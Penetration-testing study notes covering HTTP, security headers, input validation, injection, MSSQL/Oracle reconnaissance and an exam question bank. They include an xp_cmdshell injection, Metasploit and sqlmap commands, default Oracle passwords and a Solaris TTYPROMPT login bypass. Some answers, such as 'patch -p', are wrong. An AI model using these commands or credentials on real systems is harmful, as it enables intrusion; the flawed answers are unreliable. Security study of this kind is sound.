The OPTIONS method returns the HTTP methods that the server supports for the specified URL. This can be
used to check the functionality of a web server by requesting '*' instead of a specific resource.

CONNECT
The CONNECT method converts the request connection to a transparent TCP/IP tunnel, usually to
facilitate SSL-encrypted communication (HTTPS) through an unencrypted HTTP proxy.[16][17][18] See HTTP
CONNECT tunneling.

PATCH
The PATCH method applies partial modifications to a resource.[19]
All general-purpose HTTP servers are required to implement at least the GET and HEAD methods,[20] and,
whenever possible, also the OPTIONS method.

Response Codes
1xx Informational
• 100 Continue, The server has received the request headers and the client should proceed to send the
request body
• 101 Switching Protocols, e.g. when switching from HTTP to HTTP2

2xx Success
• 200 OK, Standard response for successful HTTP requests.

3xx Redirection
• 301 Moved Permanently, This and all future requests should be directed to the given URI.
• 302 Found, This is an example of industry practice contradicting the standard. The HTTP/1.0
specification (RFC 1945) required the client to perform a temporary redirect (the original describing
phrase was "Moved Temporarily"),[21] but popular browsers implemented 302 with the functionality
of a 303 See Other. Therefore, HTTP/1.1 added status codes 303 and 307 to distinguish between the
two behaviours.[22] However, some Web applications and frameworks use the 302 status code as if it
were the 303.
• 303 See Other
• 304 Not Modified

4xx Client Error
• 400 Bad Request
• 401 Unauthorized
• 403 Forbidden
• 404 Not Found
• 405 Method Not Allowed
5xx Server Error
• 500 Internal Server Error
• 501 Not Implemented
• 502 Bad Gateway
• 503 Service Unavailable

HTTP Header Fields relating to security features


• HTTP Strict Transport Security (HSTS): HTTP Strict Transport Security (HSTS) is a web security policy
mechanism which helps to protect websites against protocol downgrade attacks and cookie hijacking.
• Public Key Pinning Extension for HTTP (HPKP): HTTP Public Key Pinning (HPKP) is a security mechanism
which allows HTTPS websites to resist impersonation by attackers using mis-issued or otherwise
fraudulent certificates.
• X-Frame-Options: The X-Frame-Options response header improves the protection of web applications
against clickjacking.
• X-XSS-Protection: This header enables the Cross-site scripting (XSS) filter in your browser.
• X-Content-Type-Options: Setting this header will prevent the browser from interpreting files as something
else than declared by the content type in the HTTP headers.
• Content-Security-Policy: Content Security Policy (CSP) requires careful tuning and precise definition of the
policy. If enabled, CSP has significant impact on the way browser renders pages (e.g., inline JavaScript
disabled by default and must be explicitly allowed in policy). CSP prevents a wide range of attacks,
including Cross-site scripting and other cross-site injections.
• X-Permitted-Cross-Domain-Policies: A cross-domain policy file is an XML document that grants a web
client, such as Adobe Flash Player or Adobe Acrobat (though not necessarily limited to these), permission
to handle data across domains.
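Added example, not part of the notes: a Python audit of a constructed response header set against the headers listed above, applying the check a reviewer would make on each value (HSTS lifetime, framing policy, MIME sniffing, an inline-script allowance in CSP, and HPKP presence as a legacy finding).

```python
"""Audit an HTTP response's security headers against the list above.

Added example for these notes (not from any cited source). Header names are
matched case-insensitively, as HTTP requires. HPKP is reported rather than
required, since mainstream browsers have removed support for it, and
X-XSS-Protection is not checked because the browser filter it controlled has
been removed from most mainstream browsers.
"""
from __future__ import annotations

# Sample headers as a server might send them (constructed for this example).
SAMPLE_RESPONSE_HEADERS = {
    "Content-Type": "text/html; charset=utf-8",
    "Strict-Transport-Security": "max-age=300",
    "X-Frame-Options": "ALLOWALL",
    "X-Content-Type-Options": "nosniff",
    "Content-Security-Policy": "default-src 'self'; script-src 'self' 'unsafe-inline'",
}

# An HSTS max-age shorter than about six months protects a returning visitor
# poorly; one year is the value commonly recommended.
MIN_HSTS_AGE = 180 * 24 * 3600


def parse_hsts_max_age(value: str) -> int | None:
    """Extract max-age from a Strict-Transport-Security value, if present."""
    for directive in value.split(";"):
        name, _, arg = directive.strip().partition("=")
        if name.strip().lower() == "max-age" and arg.strip().isdigit():
            return int(arg.strip())
    return None


def audit_security_headers(headers: dict[str, str]) -> list[str]:
    """Return findings; an empty list means every checked header looks sound."""
    h = {k.lower(): v for k, v in headers.items()}
    findings: list[str] = []

    hsts = h.get("strict-transport-security")
    if hsts is None:
        findings.append("HSTS missing: downgrade and cookie-hijack protection absent")
    else:
        age = parse_hsts_max_age(hsts)
        if age is None or age < MIN_HSTS_AGE:
            findings.append(f"HSTS max-age too short: {age}")

    if h.get("x-frame-options", "").upper() not in ("DENY", "SAMEORIGIN"):
        findings.append("X-Frame-Options not DENY/SAMEORIGIN: clickjacking possible")

    if h.get("x-content-type-options", "").lower() != "nosniff":
        findings.append("X-Content-Type-Options missing: MIME sniffing allowed")

    csp = h.get("content-security-policy")
    if csp is None:
        findings.append("Content-Security-Policy missing")
    elif "'unsafe-inline'" in csp:
        findings.append("CSP allows 'unsafe-inline': inline-script XSS not mitigated")

    if "public-key-pins" in h:
        findings.append("HPKP present: deprecated, browsers no longer enforce it")
    return findings


if __name__ == "__main__":
    for finding in audit_security_headers(SAMPLE_RESPONSE_HEADERS):
        print(finding)
```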

G5) Web Mark-up Languages

7) Web Testing Methodologies


H6) Input Validation

Whitelisting allows a certain character set (e.g. only numbers for a parameter called ID) and denies everything
else.

Blacklisting denies certain character sets (e.g. forbids some special characters like < or >) and allows
everything else.

Data sanitisation is filtering/validating the input/data before it is used within an application, by escaping
special characters (e.g. < is replaced with &lt;). In PHP this can, for example, be achieved by setting
filter.default="special_chars" in php.ini. When using the function filter_input, all data is sanitised and special
characters can no longer be rendered by the browser.
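An added Python illustration of the three controls above (not the PHP mechanism the notes cite): a numeric whitelist for an ID parameter, a naive character blacklist, and output escaping via html.escape; the sample inputs are constructed.

```python
"""Whitelist, blacklist and sanitisation side by side.

Added illustration for this section; it is not the PHP mechanism the notes
cite. It shows why the whitelist is the preferred control: the naive blacklist
below passes 'OR 1=1' and an entity-encoded '<' untouched, the whitelist never
lets either through, and output escaping handles whatever does reach a page.
"""
from __future__ import annotations

import html
import re

ID_WHITELIST = re.compile(r"[0-9]{1,10}")   # numeric ID, bounded length
BLACKLIST = set("<>\"'")                    # blocks only these literal chars


def validate_id_whitelist(value: str) -> int | None:
    """Accept only 1-10 digits (no sign, no whitespace); return int or None."""
    return int(value) if ID_WHITELIST.fullmatch(value) else None


def validate_blacklist(value: str) -> bool:
    """Reject only if a forbidden character appears literally."""
    return not any(ch in BLACKLIST for ch in value)


def sanitise_for_html(value: str) -> str:
    """Escape special characters so the browser renders them as text."""
    return html.escape(value, quote=True)


def render_comment(user_input: str) -> str:
    """Escape at the point the value enters HTML, not somewhere upstream."""
    return f"<p>{sanitise_for_html(user_input)}</p>"


# Constructed inputs, including an HTML-entity-encoded '<script>'.
SAMPLES = ["42", "0000000042", "42 OR 1=1", "<script>", "&lt;script&gt;"]

if __name__ == "__main__":
    for s in SAMPLES:
        print(f"{s!r:20} whitelist={validate_id_whitelist(s)!s:5} "
              f"blacklist_ok={validate_blacklist(s)}")
    print(render_comment("<b>hi</b>"))
```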

H9) Use of Cross Site Scripting Attacks

XSS can lead to:


• Website defacement
• Attacking users of the application (e.g. with BeEF - The Browser Exploitation Framework Project)
• Phishing

H10) Use of Injections Attacks

Cheat Sheet for SQL Injection attacks: http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet

SQL Injection for Microsoft SQL Server to execute a command shell:

xp_cmdshell: Spawns a Windows command shell and passes in a string for execution.

Command:
EXEC xp_cmdshell 'dir *.exe';
Since Microsoft SQL Server 2005 the xp_cmdshell option is disabled by default; in earlier versions it was enabled
by default.

The following useful stored procedures are found in Microsoft SQL Server:
• xp_cmdshell
• sp_makewebtask
• xp_regread

Get version string

SELECT @@version

H11) Session Handling


• Session is not renewed after logging in
• Session ID generation is weak
• Session is not terminated on the server side after logging out / timing out.
• Session is not sent over TLS
• Session is sent in the URL (session rewriting) instead of in cookies. If that is done, the session ID is
disclosed in the cache and in web server logs.

H12) Encryption
Encrypting data in transit:
• Send data over an encrypted channel (HTTPS, FTPS, SSH) between client and server.
• Encrypt data before it is sent (using symmetric encryption like AES, or asymmetric like
PGP).

Encrypting data at rest:


• Encrypt data at rest by using Symmetric Encryption like AES, or Asymmetric like PGP.
• Use transparent mechanisms like Transparent Data Encryption (TDE) in MSSQL to encrypt data.
• Encrypt the whole hard disk on a server/client.

Identification and exploitation of Encoded values (e.g. Base64)


Encoded values like Base64 can be identified through the character set used. The longer the string to encode,
the longer the Base64-encoded value. It can easily be decoded; it is just a different representation of the data.

Identification and exploitation of Cryptographic values (e.g. MD5 hashes)


A hash is the fixed-length output of a one-way function. Example
hashes: https://hashcat.net/wiki/doku.php?id=example_hashes. From the length and character set used, the
kind of hash can be identified.
It cannot easily be identified what kind of encryption has been used for encrypted data, as it is just a blob.
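Added example covering both sections above (not from the notes or from hashcat): a classifier that uses only length and character set, as the text describes, to recognise Base64 or to list the candidate hash algorithms for a hex digest; the sample values are constructed in the block (the digests are computed with hashlib rather than typed in).

```python
"""Classify an opaque value as Base64, a hex digest of a known length, or unknown.

Added example for the two sections above; not from the notes or from hashcat.
Only length and character set are used, so the result is a list of candidates:
a 32-hex-character value may be MD5 or NTLM (among others), and a hex string is
also valid in the Base64 alphabet, which is why hex is tested first.
"""
import base64
import binascii
import hashlib
import re

HEX_RE = re.compile(r"^[0-9a-fA-F]+$")
B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")

# Digest lengths in hex characters; several algorithms share each length.
HEX_LENGTHS = {
    32: ["MD5", "NTLM", "MD4"],
    40: ["SHA-1", "RIPEMD-160"],
    56: ["SHA-224"],
    64: ["SHA-256", "SHA3-256", "BLAKE2s"],
    96: ["SHA-384"],
    128: ["SHA-512", "SHA3-512", "BLAKE2b", "Whirlpool"],
}


def classify(value: str) -> dict:
    """Return {'kind': ..., 'candidates': [...], 'decoded': bytes or None}."""
    s = value.strip()
    if HEX_RE.fullmatch(s) and len(s) in HEX_LENGTHS:
        return {"kind": "hex-digest", "candidates": HEX_LENGTHS[len(s)], "decoded": None}
    # Padded Base64 output is always a multiple of four characters long.
    if s and len(s) % 4 == 0 and B64_RE.fullmatch(s):
        try:
            raw = base64.b64decode(s, validate=True)
        except (binascii.Error, ValueError):
            raw = None
        if raw is not None:
            return {"kind": "base64", "candidates": ["Base64 (encoding, not encryption)"],
                    "decoded": raw}
    return {"kind": "unknown", "candidates": [], "decoded": None}


# Constructed inputs: a Base64-encoded credential pair, the MD5 and SHA-256
# digests of the string 'password' (computed here, not typed in), and a blob
# that is neither.
B64_SAMPLE = base64.b64encode(b"admin:Passw0rd").decode()
MD5_SAMPLE = hashlib.md5(b"password").hexdigest()
SHA256_SAMPLE = hashlib.sha256(b"password").hexdigest()
SAMPLES = [B64_SAMPLE, MD5_SAMPLE, SHA256_SAMPLE, "not$an$encoding"]

if __name__ == "__main__":
    for s in SAMPLES:
        r = classify(s)
        print(f"{s[:24]:26} {r['kind']:11} {r['candidates']} {r['decoded']!r}")
```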

Common SSL Vulnerabilities:


SSLv2 should not be used, as it has been considered broken for a long time.
SSLv3 should not be used anymore, as this protocol is considered broken (POODLE).
RC4 should not be used as a cipher, as it is considered broken.
POODLE (Padding Oracle On Downgraded Legacy Encryption)
BEAST (Browser Exploit Against SSL/TLS)
BREACH (Browser Reconnaissance & Exfiltration via Adaptive Compression of Hypertext)
Heartbleed Bug
CRIME (Compression Ratio Info-leak Made Easy)
FREAK (Factoring Attack on RSA-EXPORT Keys)
DROWN (DROWN stands for Decrypting RSA with Obsolete and Weakened eNcryption)

H13) Source Code Review

Source Code Review is checking for bad practices/known vulnerabilities at the source code level (e.g. using
concatenated strings for SQL queries instead of prepared statements, or wrongly implemented encryption).

Automated approach:
• Static application security testing (SAST) is a set of technologies designed to analyze application
source code, byte code and binaries for coding and design conditions that are indicative of security
vulnerabilities. SAST solutions analyze an application from the “inside out” in a nonrunning state.

• Dynamic Application Security Testing (DAST) technologies are designed to detect conditions
indicative of a security vulnerability in an application in its running state. Most DAST solutions test
only the exposed HTTP and HTML interfaces of Web-enabled applications; however, some solutions
are designed specifically for non-Web protocol and data malformation (for example, remote
procedure call, Session Initiation Protocol [SIP] and so on).

8) Database

J1) Microsoft SQL Server

Microsoft SQL Server (MSSQL)


Running on port 1433 (normal mode)
Running on port 2433 (hidden mode)

Attack Vector
Recon with Nmap to identify Service Pack Level and version.
Brute Forcing DB accounts (Hydra)

msf> use auxiliary/scanner/mssql/mssql_ping


msf> set RHOSTS <IP>
msf> run

Privilege Escalation
Once credentials are obtained and set, Metasploit can check for security issues.
msf> use auxiliary/admin/mssql/mssql_enum
msf> run

J2) Oracle RDBMS

Oracle TNS (Transparent Network Substrate) running on port 1521


TNS is a proprietary Oracle computer-networking technology that supports homogeneous peer-to-peer
connectivity on top of other networking technologies such as TCP/IP, SDP and named pipes. TNS is used
mainly for connections to Oracle databases.

Get Patch information from an Oracle DB


This lists the interim patches applied to the Oracle binaries.
$ opatch lsinventory -details

The patches applied on DB are listed with:


select * from sys.registry$history;

Derivation of version and patch information from hosts running Oracle software.
Version information:
SELECT * FROM v$version;
This query would output something like this:
Banner
--------------------------------------------------------------------------------------
Oracle Database 11g Express Edition Release 11.2.0.2.0 - 64bit Production
PL/SQL Release 11.2.0.2.0 - Production
CORE 11.2.0.2.0 Production
TNS for Linux: Version 11.2.0.2.0 - Production
NLSRTL Version 11.2.0.2.0 - Production

sqlmap -r request.txt -p id --dbms=oracle --banner

#1521 is the default port of Oracle DB (Oracle Net Listener)


nmap -p 1521 <IP>

tnscmd10g version -h <IP>


tnscmd10g status -h <IP>

msf > use auxiliary/scanner/oracle/sid_enum


msf auxiliary(tnslsnr_version) > run

Default Oracle accounts

Role Name          Password
ORD_SERVER         ODS
WKADMIN            WKADMIN
WKUSER             WKUSER
WKSYS              WKSYS
SCOTT              TIGER
SYSTEM             MANAGER
DBSNMP             DBSNMP
SYS                CHANGE_ON_INSTALL
OUTLN              OUTLN
MDSYS              MDSYS
CTXSYS             CTXSYS
ORDSYS             ORDSYS
ANONYMOUS          ANONYMOUS

What is an Oracle SID?

Oracle System ID
The Oracle System ID (SID) is used to uniquely identify a particular database on a system. For this reason, one
cannot have more than one database with the same SID on a computer system.

J3) Web / App / Database Connectivity


When a Web application involves database access, it must provide credentials to SQL Server (that is, it must
log in to SQL Server) just as any other user or process would to be able to interact with the database.
Therefore, special drivers or connectors are needed, for the different programming languages available:

ADO.NET is a data access technology from the Microsoft .NET Framework which provides communication
between relational and non-relational systems through a common set of components. ADO.NET is a set of
computer software components that programmers can use to access data and data services from the
database.

Java Database Connectivity (JDBC)


JDBC is an application programming interface (API) for the Java programming language, which defines how a client
may access a database. It is part of the Java Standard Edition platform, from Oracle Corporation.

Open Database Connectivity (ODBC)


ODBC is an open standard application programming interface (API) for accessing a database.

OLE DB (Object Linking and Embedding, Database, sometimes written as OLEDB or OLE-DB)
OLE DB is an API designed by Microsoft that allows accessing data from a variety of sources in a uniform manner. The API
provides a set of interfaces implemented using the Component Object Model (COM); it is otherwise unrelated
to OLE.

Question Bank

Which OS is vulnerable to the sadmind RCE?


Based on preliminary analysis, the sadmind/IIS worm exploits a vulnerability in Solaris systems and
subsequently installs software to attack Microsoft IIS web servers. In addition, it includes a component to
propagate itself automatically to other vulnerable Solaris systems.
(http://www.cert.org/historical/advisories/CA-2001-11.cfm)
What is the exploit technique behind the Solaris TTYPROMPT login bypass?
https://packetstormsecurity.com/files/114491/Solaris-TTYPROMPT-Remote-Login-Bypass.html
Solaris TTYPROMPT Security Vulnerability (Telnet)

This vulnerability is very simple to exploit, since it does not require any code to be compiled by an attacker.
The vulnerability only requires the attacker to simply define the environment variable TTYPROMPT to a 6-
character string, inside telnet. Jonathan believes this overflows an integer inside login, which specifies whether
the user has been authenticated (just a guess).

Once connected to the remote host, you must type the username, followed by 64 " c"s, and a literal "\n". You
will then be logged in as the user without any password authentication. This should work with any account
except root (unless remote root login is allowed).

Example:
coma% telnet
telnet> environ define TTYPROMPT abcdef
telnet> o localhost
SunOS 5.8
bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c\n
Last login: whenever
$ whoami
bin

What tool is used to trace the files an executable has accessed when it is run in Linux?
/usr/bin/strace

What command is used to check the OS patch level in Windows?

Get-HotFix

Internal IP range stated in RFC 1918


10.0.0.0/8
172.16.0.0/12
192.168.0.0/16

What is the default port of DB2?


TCP 50000

-rwxr-xr-x 1 root root file1

Can a non-root user copy the file above?
Yes, copying does not require write access.

What is the exploit on Linux bash 4.1?

Shellshock exploit

What is the command in Linux to check patch level?


patch -p

What does CRLF stand for?


Carriage Return Line Feed

What is running on port 3128?


Squid proxy

What is running on port 1524?


Ingres
How many TCP ports in total?
65535 ports

What does SOA stand for?


Start of Authority

What is the subnet mask for /23 network?


255.255.254.0

What is the command to perform domain transfer in Linux?


dig @server domain axfr

What does WSDL stand for?


Web Services Description Language

What does SCADA stand for?


Supervisory control and data acquisition

Which is not part of the HTTP header?


PROPGET

How can a blind spoofing response be identified?


Sequence Numbers

XML Injection on?


SOAP (Simple Object Access Protocol)

What are the vulnerabilities in PHP CGI?


Query String Code Execution
In vulnerable configurations, PHP treats certain query string parameters as command line arguments including
switches such as '-s', '-d', and '-c'.
